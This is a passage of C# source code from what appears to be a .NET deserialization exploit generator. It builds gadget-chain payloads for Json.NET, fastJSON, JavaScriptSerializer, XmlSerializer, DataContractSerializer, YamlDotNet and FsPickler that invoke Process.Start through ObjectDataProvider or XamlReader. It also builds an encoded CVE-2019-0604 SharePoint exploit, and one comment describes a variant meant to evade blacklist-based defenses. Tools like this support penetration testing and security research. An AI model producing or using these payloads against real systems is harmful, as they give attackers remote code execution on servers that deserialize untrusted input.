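        cmdPart = "'" + inputArgs.CmdFileName + "'";
    }

    string payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':["
        + cmdPart
        + @"] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }";

    if (inputArgs.Minify)
    {
        if (inputArgs.UseSimpleType)
        {
            // The listed assembly names may be stripped from the "$type" values by the minifier.
            payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null);
        }
        else
        {
            payload = JSONMinifier.Minify(payload, null, null);
        }
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.JsonNet_deserialize(payload);
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// fastJSON variant: the "$types" table maps ObjectDataProvider, Process and ProcessStartInfo to short ids
/// that the rest of the document refers to.
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to JSON here.</param>
/// <returns>The JSON payload.</returns>
private static string BuildFastJsonPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

    string cmdPart;
    if (inputArgs.HasArguments)
    {
        cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @"""";
    }
    else
    {
        cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @"""";
    }

    string payload = @"{ ""$types"":{ ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"", ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"", ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3"" }, ""$type"":""1"", ""ObjectInstance"":{ ""$type"":""2"", ""StartInfo"":{ ""$type"":""3"", "
        + cmdPart
        + @" } }, ""MethodName"":""Start"" }";

    if (inputArgs.Minify)
    {
        payload = JSONMinifier.Minify(payload, null, null);
    }

    if (inputArgs.Test)
    {
        try
        {
            // Result intentionally discarded; the call is only a self-test of the generated document.
            JSON.ToObject<Object>(payload);
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// JavaScriptSerializer variant: "__type"-annotated ObjectDataProvider / Process / ProcessStartInfo graph.
/// Only meaningful where the consumer was configured with a type resolver that honours "__type".
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to JSON here.</param>
/// <returns>The JSON payload.</returns>
private static string BuildJavaScriptSerializerPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

    string cmdPart;
    if (inputArgs.HasArguments)
    {
        cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'";
    }
    else
    {
        cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'";
    }

    string payload = @"{ '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'ObjectInstance':{ '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'StartInfo': { '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', "
        + cmdPart
        + @" } } }";

    if (inputArgs.Minify)
    {
        payload = JSONMinifier.Minify(payload, null, null);
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.JavaScriptSerializer_deserialize(payload);
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// XmlSerializer variant: an ExpandedWrapper`2 root whose ProjectedProperty0 is an ObjectDataProvider
/// calling XamlReader.Parse on the CDATA-embedded XAML from <see cref="BuildProcessStartXaml"/>.
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to XML here.</param>
/// <returns>The XML payload.</returns>
private static string BuildXmlSerializerPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
    string xaml = BuildProcessStartXaml(inputArgs);

    string payload = @"<?xml version=""1.0""?> <root type="""
        + XamlReaderExpandedWrapperTypeName
        + @"""> <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" > <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string""> <![CDATA["
        + xaml
        + @"]]> </anyType> </MethodParameters> <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </root> ";

    if (inputArgs.Minify)
    {
        payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true);
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.XMLSerializer_deserialize(payload, null, "root");
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// DataContractSerializer variant built on the XmlSerializer layout (XamlReader.Parse over embedded XAML)
/// with DataContract namespaces and z:Id/z:Ref references.
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to XML here.</param>
/// <returns>The XML payload.</returns>
private static string BuildDataContractSerializer2Payload(InputArgs inputArgs)
{
    // This by mixing what we had already in xmlserializer and datacontractserializer
    // this can be useful to bypass deserializers that are based on a blacklist
    inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
    string xaml = BuildProcessStartXaml(inputArgs);

    string payload = @"<?xml version=""1.0""?> <root type="""
        + XamlReaderExpandedWrapperTypeName
        + @"""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA["
        + xaml
        + @"]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> ";

    if (inputArgs.Minify)
    {
        payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.DataContractSerializer_deserialize(payload, null, "root");
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// DataContractSerializer variant: ExpandedWrapper`2 closed over Process and ObjectDataProvider, with the
/// command passed directly as MethodParameters strings (no embedded XAML).
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to XML here.</param>
/// <returns>The XML payload.</returns>
private static string BuildDataContractSerializerPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

    string cmdPart;
    if (inputArgs.HasArguments)
    {
        cmdPart = @"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType> <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>";
    }
    else
    {
        // The single-parameter form declares the Arrays namespace inline instead of using the b: prefix.
        cmdPart = @"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>";
    }

    string payload = @"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:c=""http://www.w3.org/2001/XMLSchema"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <ExpandedElement z:Id=""ref1"" > <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Start</a:MethodName> <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> "
        + cmdPart
        + @" </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> </root> ";

    if (inputArgs.Minify)
    {
        payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.DataContractSerializer_deserialize(payload, null, "root");
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// YamlDotNet variant: local tags of the form "!&lt;!Type,Assembly,...&gt;" name ObjectDataProvider,
/// Process and ProcessStartInfo. Only meaningful where the consumer resolves such tags to CLR types.
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to YamlDotNet here.</param>
/// <returns>The YAML payload (leading space intentional, as in the original).</returns>
private static string BuildYamlDotNetPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;

    string cmdPart;
    if (inputArgs.HasArguments)
    {
        cmdPart = "FileName: " + inputArgs.CmdFileName + ", Arguments: " + inputArgs.CmdArguments;
    }
    else
    {
        cmdPart = "FileName: " + inputArgs.CmdFileName;
    }

    string payload = @" !<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> { MethodName: Start, ObjectInstance: !<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { StartInfo: !<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { "
        + cmdPart
        + @" } } }";

    if (inputArgs.Minify)
    {
        payload = YamlDocumentMinifier.Minify(payload);
    }

    if (inputArgs.Test)
    {
        try
        {
            SerializersHelper.YamlDotNet_deserialize(payload);
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}

/// <summary>
/// FsPickler (JSON) variant: a NamedType entry for TextFormattingRunProperties whose ForegroundBrush
/// serialization entry is the JSON-escaped XAML from <see cref="BuildProcessStartXaml"/>.
/// </summary>
/// <param name="inputArgs">Command and options; <c>CmdType</c> is set to XML here because the command ends up inside XAML.</param>
/// <returns>The JSON payload.</returns>
private static string BuildFsPicklerPayload(InputArgs inputArgs)
{
    inputArgs.CmdType = CommandArgSplitter.CommandType.XML;

    // The XAML is embedded in a JSON string value, so it must be JSON-escaped after the XML escaping.
    string internalPayload = CommandArgSplitter.JsonStringEscape(BuildProcessStartXaml(inputArgs));

    string payload = @"{ ""FsPickler"": ""4.0.0"", ""type"": ""System.Object"", ""value"": { ""_flags"": ""subtype"", ""subtype"": { ""Case"": ""NamedType"", ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"", ""Assembly"": { ""Name"": ""Microsoft.PowerShell.Editor"", ""Version"": ""3.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""31bf3856ad364e35"" } }, ""instance"": { ""serializationEntries"": [ { ""Name"": ""ForegroundBrush"", ""Type"": { ""Case"": ""NamedType"", ""Name"": ""System.String"", ""Assembly"": { ""Name"": ""mscorlib"", ""Version"": ""4.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""b77a5c561934e089"" } }, ""Value"": """
        + internalPayload
        + @""" } ] } } }";

    if (inputArgs.Minify)
    {
        payload = JSONMinifier.Minify(payload, null, null);
    }

    if (inputArgs.Test)
    {
        try
        {
            var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true);
            serializer.UnPickleOfString<Object>(payload);
        }
        catch (Exception err)
        {
            Debugging.ShowErrors(inputArgs, err);
        }
    }

    return payload;
}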
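/// <summary>
/// Builds the two-part payload for the CVE-2019-0604 (SharePoint) generator: an assembly-qualified type
/// name, a ':' separator, then the serialized body. When <c>useurl</c> is set the body is a
/// TextFormattingRunProperties DataContractSerializer payload that points at <c>cmd</c> as a XAML URL
/// (variant 3); otherwise the body is an ExpandedWrapper/XamlReader document with the split command inline.
/// The concatenation is minified, prefixed with "__bp", and hex-encoded by <c>HexEncode</c>.
/// </summary>
/// <returns>The encoded payload string.</returns>
/// <exception cref="OverflowException">The combined payload is 16384 characters or longer: the checked
/// <c>(char)(payload.Length &lt;&lt; 2)</c> length prefix no longer fits in a char.</exception>
public string CVE_2019_0604()
{
    string payloadPart1;
    string payloadPart2;

    if (useurl)
    {
        // Delegate body generation to the TextFormattingRunProperties generator; the placeholder command
        // is never used because the XAML is fetched from the URL passed as --xamlurl.
        InputArgs inputArgs = new InputArgs();
        inputArgs.Cmd = "foobar";
        inputArgs.IsRawCmd = true;
        inputArgs.ExtraInternalArguments = new List<string> { "--variant", "3", "--xamlurl", cmd };
        inputArgs.Minify = true;
        inputArgs.UseSimpleType = true;

        // Spaces are stripped from the assembly-qualified name to keep the prefix short.
        payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":";
        payloadPart1 = payloadPart1.Replace(" ", "");

        TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator();
        payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs);
    }
    else
    {
        payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";

        bool hasArgs;
        string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);

        string cmdPart;
        if (hasArgs)
        {
            cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
        }
        else
        {
            cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
        }

        // NOTE(review): this verbatim string is not interpolated, so the doubled braces are emitted
        // literally as {{d:Type c:Process}}; the interpolated strings in Generate emit a single pair.
        // Confirm this difference is intended before touching it.
        payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"
            + cmdPart
            + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
    }

    // we need to make it smaller as goes bigger after encoding
    payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true);

    string payload = payloadPart1 + payloadPart2;

    // NOTE(review): writes the un-encoded payload to stdout before the encoded result is returned; this
    // sits next to a commented-out diagnostic print in the original and looks like leftover debugging —
    // confirm no caller depends on it before removing.
    Console.WriteLine(payload);

    StringBuilder stringBuilder = new StringBuilder();
    stringBuilder.Append("__bp");
    // Length prefix: the payload length shifted left by two, hex-encoded as a single char. 'checked' makes
    // an overlong payload fail loudly instead of silently truncating.
    HexEncode(checked((char)(payload.Length << 2)), stringBuilder);
    HexEncode(payload, stringBuilder);
    return stringBuilder.ToString();
}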